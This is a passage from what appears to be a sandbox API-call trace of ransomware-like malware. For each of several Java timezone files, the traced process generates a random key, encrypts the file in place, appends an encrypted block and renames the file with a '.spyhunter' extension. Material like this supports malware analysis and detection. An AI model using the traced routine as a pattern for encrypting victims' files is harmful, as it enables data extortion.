(lpFirst="El_Salvador", lpSrch=".txt") returned 0x0 [0171.358] GetProcessHeap () returned 0x2c0000 [0171.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.358] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4ec*=0x69, lpOverlapped=0x0) returned 1 [0171.359] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.359] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4ec*=0x69, lpOverlapped=0x0) returned 1 [0171.359] GetProcessHeap () returned 0x2c0000 [0171.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.360] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.360] WriteFile (in: hFile=0xb0, lpBuffer=0x248e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x248e52c*, lpNumberOfBytesWritten=0x248e4ec*=0x4, lpOverlapped=0x0) returned 1 [0171.360] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4ec*=0x30, lpOverlapped=0x0) returned 1 [0171.360] CloseHandle (hObject=0xb0) returned 1 [0171.360] GetProcessHeap () returned 0x2c0000 [0171.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.360] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.spyhunter") returned 73 [0171.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador.spyhunter")) returned 1 [0171.361] GetProcessHeap () returned 0x2c0000 [0171.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.361] GetProcessHeap () returned 0x2c0000 [0171.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.362] GetProcessHeap () returned 0x2c0000 [0171.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3f70 | out: hHeap=0x2c0000) returned 1 [0171.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e528 | out: pbBuffer=0x248e528) returned 1 [0171.362] GetProcessHeap () returned 0x2c0000 [0171.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.362] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e520*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e520*=0x30) returned 1 [0171.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.363] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe") returned 60 [0171.363] StrStrW (lpFirst="Eirunepe", lpSrch=".txt") returned 0x0 [0171.363] GetProcessHeap () returned 0x2c0000 [0171.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.363] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4e4*=0x141, lpOverlapped=0x0) returned 1 [0171.364] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffebf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.364] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x141, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4e4*=0x141, lpOverlapped=0x0) returned 1 [0171.365] GetProcessHeap () returned 0x2c0000 [0171.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.365] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.365] WriteFile (in: hFile=0xb0, lpBuffer=0x248e524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x248e524*, lpNumberOfBytesWritten=0x248e4e4*=0x4, lpOverlapped=0x0) returned 1 [0171.365] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4e4*=0x30, lpOverlapped=0x0) returned 1 [0171.365] CloseHandle (hObject=0xb0) returned 1 [0171.365] GetProcessHeap () returned 0x2c0000 [0171.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.365] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.spyhunter") returned 70 [0171.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe.spyhunter")) returned 1 [0171.366] GetProcessHeap () returned 0x2c0000 [0171.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.366] GetProcessHeap () returned 0x2c0000 [0171.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.367] GetProcessHeap () returned 0x2c0000 [0171.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3ea8 | out: hHeap=0x2c0000) returned 1 [0171.367] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e528 | out: pbBuffer=0x248e528) returned 1 [0171.367] GetProcessHeap () returned 0x2c0000 [0171.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e520*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e520*=0x30) returned 1 [0171.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.368] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton") returned 60 [0171.368] StrStrW (lpFirst="Edmonton", lpSrch=".txt") returned 0x0 [0171.368] GetProcessHeap () returned 0x2c0000 [0171.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.368] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4e4*=0x524, lpOverlapped=0x0) returned 1 [0171.408] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffadc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.408] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x524, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4e4*=0x524, lpOverlapped=0x0) returned 1 [0171.422] GetProcessHeap () returned 0x2c0000 [0171.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.422] WriteFile (in: hFile=0xb0, lpBuffer=0x248e524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x248e524*, lpNumberOfBytesWritten=0x248e4e4*=0x4, lpOverlapped=0x0) returned 1 [0171.422] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4e4*=0x30, lpOverlapped=0x0) returned 1 [0171.422] CloseHandle (hObject=0xb0) returned 1 [0171.422] GetProcessHeap () returned 0x2c0000 [0171.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.422] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.spyhunter") returned 70 [0171.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton.spyhunter")) returned 1 [0171.424] GetProcessHeap () returned 0x2c0000 [0171.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.424] GetProcessHeap () returned 0x2c0000 [0171.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.424] GetProcessHeap () returned 0x2c0000 [0171.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3de0 | out: hHeap=0x2c0000) returned 1 [0171.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e520 | out: pbBuffer=0x248e520) returned 1 [0171.424] GetProcessHeap () returned 0x2c0000 [0171.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.424] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e518*=0x30) returned 1 [0171.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.425] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek") returned 64 [0171.425] StrStrW (lpFirst="Dawson_Creek", lpSrch=".txt") returned 0x0 [0171.425] GetProcessHeap () returned 0x2c0000 [0171.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.433] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4dc*=0x1fd, lpOverlapped=0x0) returned 1 [0171.434] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.435] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1fd, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4dc*=0x1fd, lpOverlapped=0x0) returned 1 [0171.435] GetProcessHeap () returned 0x2c0000 [0171.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.435] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.435] WriteFile (in: hFile=0xb0, lpBuffer=0x248e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x248e51c*, lpNumberOfBytesWritten=0x248e4dc*=0x4, lpOverlapped=0x0) returned 1 [0171.435] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4dc*=0x30, lpOverlapped=0x0) returned 1 [0171.435] CloseHandle (hObject=0xb0) returned 1 [0171.435] GetProcessHeap () returned 0x2c0000 [0171.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.435] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.spyhunter") returned 74 [0171.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek.spyhunter")) returned 1 [0171.437] GetProcessHeap () returned 0x2c0000 [0171.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.437] GetProcessHeap () returned 0x2c0000 [0171.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.437] GetProcessHeap () returned 0x2c0000 [0171.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04378 | out: hHeap=0x2c0000) returned 1 [0171.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e520 | out: pbBuffer=0x248e520) returned 1 [0171.437] GetProcessHeap () returned 0x2c0000 [0171.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e518*=0x30) returned 1 [0171.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson") returned 58 [0171.438] StrStrW (lpFirst="Dawson", lpSrch=".txt") returned 0x0 [0171.438] GetProcessHeap () returned 0x2c0000 [0171.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.438] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4dc*=0x454, lpOverlapped=0x0) returned 1 [0171.531] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.531] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x454, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4dc*=0x454, lpOverlapped=0x0) returned 1 [0171.532] GetProcessHeap () returned 0x2c0000 [0171.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.532] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.532] WriteFile (in: hFile=0xb0, lpBuffer=0x248e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x248e51c*, lpNumberOfBytesWritten=0x248e4dc*=0x4, lpOverlapped=0x0) returned 1 [0171.532] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4dc*=0x30, lpOverlapped=0x0) returned 1 [0171.532] CloseHandle (hObject=0xb0) returned 1 [0171.532] GetProcessHeap () returned 0x2c0000 [0171.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.532] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.spyhunter") returned 68 [0171.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson.spyhunter")) returned 1 [0171.553] GetProcessHeap () returned 0x2c0000 [0171.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.553] GetProcessHeap () returned 0x2c0000 [0171.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.553] GetProcessHeap () returned 0x2c0000 [0171.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60c00 | out: hHeap=0x2c0000) returned 1 [0171.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e518 | out: pbBuffer=0x248e518) returned 1 [0171.553] GetProcessHeap () returned 0x2c0000 [0171.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e510*=0x30) returned 1 [0171.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.555] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman") returned 58 [0171.555] StrStrW (lpFirst="Cayman", lpSrch=".txt") returned 0x0 [0171.555] GetProcessHeap () returned 0x2c0000 [0171.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.555] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4d4*=0x41, lpOverlapped=0x0) returned 1 [0171.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.556] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4d4*=0x41, lpOverlapped=0x0) returned 1 [0171.556] GetProcessHeap () returned 0x2c0000 [0171.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.556] WriteFile (in: hFile=0xb0, lpBuffer=0x248e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x248e514*, lpNumberOfBytesWritten=0x248e4d4*=0x4, lpOverlapped=0x0) returned 1 [0171.556] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4d4*=0x30, lpOverlapped=0x0) returned 1 [0171.556] CloseHandle (hObject=0xb0) returned 1 [0171.557] GetProcessHeap () returned 0x2c0000 [0171.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.557] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.spyhunter") returned 68 [0171.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman.spyhunter")) returned 1 [0171.558] GetProcessHeap () returned 0x2c0000 [0171.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.558] GetProcessHeap () returned 0x2c0000 [0171.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.558] GetProcessHeap () returned 0x2c0000 [0171.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60840 | out: hHeap=0x2c0000) returned 1 [0171.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e518 | out: pbBuffer=0x248e518) returned 1 [0171.558] GetProcessHeap () returned 0x2c0000 [0171.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e510*=0x30) returned 1 [0171.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.560] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne") returned 59 [0171.561] StrStrW (lpFirst="Cayenne", lpSrch=".txt") returned 0x0 [0171.561] GetProcessHeap () returned 0x2c0000 [0171.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.561] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e4d4*=0x4d, lpOverlapped=0x0) returned 1 [0171.562] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.562] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e4d4*=0x4d, lpOverlapped=0x0) returned 1 [0171.562] GetProcessHeap () returned 0x2c0000 [0171.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.562] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.562] WriteFile (in: hFile=0xb0, lpBuffer=0x248e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x248e514*, lpNumberOfBytesWritten=0x248e4d4*=0x4, lpOverlapped=0x0) returned 1 [0171.562] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4d4*=0x30, lpOverlapped=0x0) returned 1 [0171.562] CloseHandle (hObject=0xb0) returned 1 [0171.562] GetProcessHeap () returned 0x2c0000 [0171.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.562] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files 